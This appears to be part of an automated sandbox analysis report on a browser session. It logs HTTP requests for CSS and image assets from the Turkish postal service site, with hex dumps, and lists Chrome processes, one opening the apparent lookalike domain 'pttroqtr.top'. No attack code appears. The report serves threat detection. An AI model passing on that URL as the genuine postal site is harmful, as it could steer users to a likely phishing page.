                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 63 61 6c 65 28 31 2e 32 29 7d 32 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 32 35 64 65 67 29 20 73 63 61 6c 65 28 31 2e 32 29 7d 33 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 64 65 67 29 20 73 63 61 6c 65 28 31 2e 32 29 7d 33 35 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 2e 32 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 2e 73 74 79 6c 65 73 5f 69 73 41 63 74 69 76 65 5f 5f 67 57 4e 38 54 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 70 61 63 69 74 79 3a 31 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 40 6d 65 64 69 61 20
                                                                                                                                                                                            Data Ascii: cale(1.2)}25%{transform:rotate(-25deg) scale(1.2)}30%{transform:rotate(-35deg) scale(1.2)}35%{transform:rotate(-45deg) scale(1.2)}to{transform:rotate(0deg)}}.styles_isActive__gWN8T{visibility:visible!important;opacity:1!important;position:relative}@media
                                                                                                                                                                                            2024-09-28 03:39:44 UTC2629INData Raw: 28 2d 35 30 25 29 20 72 6f 74 61 74 65 28 31 33 35 64 65 67 29 7d 2e 73 74 79 6c 65 73 5f 74 69 6d 65 4c 69 6e 65 5f 5f 5f 53 47 59 69 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 2d 72 65 76 65 72 73 65 7d 2e 73 74 79 6c 65 73 5f 74 69 6d 65 4c 69 6e 65 5f 5f 5f 53 47 59 69 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 3e 2e 73 74 79 6c 65 73 5f 74 69 74 6c 65 5f 5f 46 77 64 6d 71 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 7d 2e 73 74 79 6c 65 73 5f 74 69 6d 65 4c 69 6e 65 5f 5f 5f 53 47 59 69 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 3e 2e 73 74 79 6c 65 73 5f 64 61 74 65 74 69 6d 65 5f 5f 5a 6b 44 35 54 3e 2e 73 74 79 6c 65 73 5f 61 72 72 6f 77 6f
                                                                                                                                                                                            Data Ascii: (-50%) rotate(135deg)}.styles_timeLine___SGYi>li:nth-child(2n){flex-direction:column-reverse}.styles_timeLine___SGYi>li:nth-child(2n)>.styles_title__Fwdmq{align-items:flex-end}.styles_timeLine___SGYi>li:nth-child(2n)>.styles_datetime__ZkD5T>.styles_arrowo


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            148192.168.2.549873185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC609OUTGET /_next/static/css/21ec1dd6e7fd01ba.css HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: undefined=1
                                                                                                                                                                                            2024-09-28 03:39:44 UTC384INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"189b-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Length: 6299
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:44 UTC6299INData Raw: 2e 73 74 79 6c 65 5f 6d 65 6e 75 50 61 6e 65 6c 5f 5f 45 68 51 6c 4c 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 38 66 38 7d 2e 73 74 79 6c 65 5f 6d 65 6e 75 5f 5f 67 65 55 6a 45 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 23 30 30 61 36 63 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 38 66 38 3b 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 3b 6f 76 65 72 66 6c 6f 77 3a 73 63 72 6f 6c 6c 3b 74 6f 70 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 20 2e 35 72 65 6d 20 32 72 65 6d 20 32 72 65 6d 7d 2e 73 74 79 6c 65 5f 6d 65 6e 75 5f 5f 67 65 55 6a 45 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b
                                                                                                                                                                                            Data Ascii: .style_menuPanel__EhQlL{padding-left:1rem;background-color:#f8f8f8}.style_menu__geUjE{border-left:#00a6cc;background-color:#f8f8f8;position:sticky;overflow:scroll;top:0;max-height:100vh;padding:1.5rem .5rem 2rem 2rem}.style_menu__geUjE::-webkit-scrollbar{


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            149192.168.2.549872185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC711OUTGET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75 HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: undefined=1
                                                                                                                                                                                            2024-09-28 03:39:44 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                            Xet-Cookie:
                                                                                                                                                                                            Age: 24388
                                                                                                                                                                                            Date: Fri, 27 Sep 2024 20:53:17 GMT
                                                                                                                                                                                            Cache-Control: max-age=315360000,public,immutable
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Via: PTT-CACHE
                                                                                                                                                                                            ETag: mok8GfjH2z4bworEGAKQmFYAPDUECmCR+MArWdHtXNI=
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: image/webp
                                                                                                                                                                                            Vary: Accept
                                                                                                                                                                                            Content-Disposition: inline; filename="183logo.webp"
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
                                                                                                                                                                                            X-Nextjs-Cache: HIT
                                                                                                                                                                                            Content-Length: 7148
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:44 UTC6577INData Raw: 52 49 46 46 e4 1b 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 ff 00 00 65 00 00 41 4c 50 48 bc 12 00 00 01 f0 86 6d db b2 39 cd fe 6d c7 79 1e f7 cc c4 26 4a 14 d2 a0 0d c5 2d c1 dd a2 f0 e0 ee ee 0d c1 dd dd ad 14 4d 70 f7 ba e1 2e 2d 2e c1 a1 49 80 08 44 66 ee 4b f6 0f f7 75 dd 73 4f 96 74 99 8f 4f 44 4c 00 ff cf d7 e8 a1 20 78 ec 9a 05 20 00 11 30 eb 82 19 eb 1c be 26 46 60 e9 43 b6 02 eb 72 45 0e 93 b4 1f 4d ac 2f e9 5a 42 57 cb e8 d6 f6 fa c8 f7 e6 ba f1 42 75 8d db b5 22 a1 8b 15 18 a2 b3 b9 4c 03 e0 cb 67 d9 56 9b 13 bb 5c 83 74 31 d7 aa 3f 4c 7b 89 1d b5 49 17 6c 98 2e e1 3a 0d 84 cf 5f 62 27 6d 81 77 ad cc 68 d1 59 5c a2 08 9f 3e cb d6 5a 0b ac 2b 64 66 05 46 18 3b 49 4f 8f fd 8b 8e de 67 df 19 9f 6c 77 9d 2e dd be 15 eb ea c4 08 10 dc
                                                                                                                                                                                            Data Ascii: RIFFWEBPVP8XeALPHm9my&J-Mp.-.IDfKusOtODL x 0&F`CrEM/ZBWBu"LgV\t1?L{Il.:_b'mwhY\>Z+dfF;IOglw.
                                                                                                                                                                                            2024-09-28 03:39:44 UTC571INData Raw: 91 a5 c6 c8 e3 8e 64 b2 cf f9 91 ea d0 27 6a 2a a7 c2 b5 2a 89 45 65 68 02 8f 15 d7 82 99 77 54 b9 62 dc 33 f0 ac 7f f2 ee a8 6d af e4 ed 6e d5 de 72 42 6c d5 38 07 b1 ec 4d 1d 85 5b 68 c0 c4 14 81 b1 29 d5 9d 7b a1 11 a3 54 45 13 e4 7e 41 07 aa c2 85 a1 ae b4 91 3d 77 7f ee b6 bb 12 88 4a d2 99 21 54 bb 95 b4 60 4a 85 49 b7 5d 29 39 3d 93 6f ec 4b 58 38 16 cc 31 55 98 b9 5e 6e 1a 50 85 14 31 b2 e0 e2 ed 55 ea 44 57 12 29 64 35 47 5e 62 e1 e6 20 9e 7a 03 8a b7 ee 39 72 44 68 58 15 84 c1 85 ef d9 e2 88 0c 20 88 a6 a5 97 29 2b 05 3d b0 49 28 ff ef 3d 34 be a8 73 89 92 62 b2 06 3e 46 ba 45 d7 74 c9 ca 56 5e 8d 74 76 37 f8 11 f9 4d 6c b2 6d 00 f0 a1 dc 39 16 11 14 00 30 ae a2 7a 49 c7 c2 70 1a 67 bc 6c 28 3f a4 41 b9 1e be 54 3d 70 2d 14 0f 3d ac b2 7f 5d 83
                                                                                                                                                                                            Data Ascii: d'j**EehwTb3mnrBl8M[h){TE~A=wJ!T`JI])9=oKX81U^nP1UDW)d5G^b z9rDhX )+=I(=4sb>FEtV^tv7Mlm90zIpgl(?AT=p-=]


                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:23:39:13
                                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:23:39:15
                                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1636,i,8772611216806412330,10793707389040936366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:23:39:17
                                                                                                                                                                                            Start date:27/09/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pttroqtr.top/help"
                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            No disassembly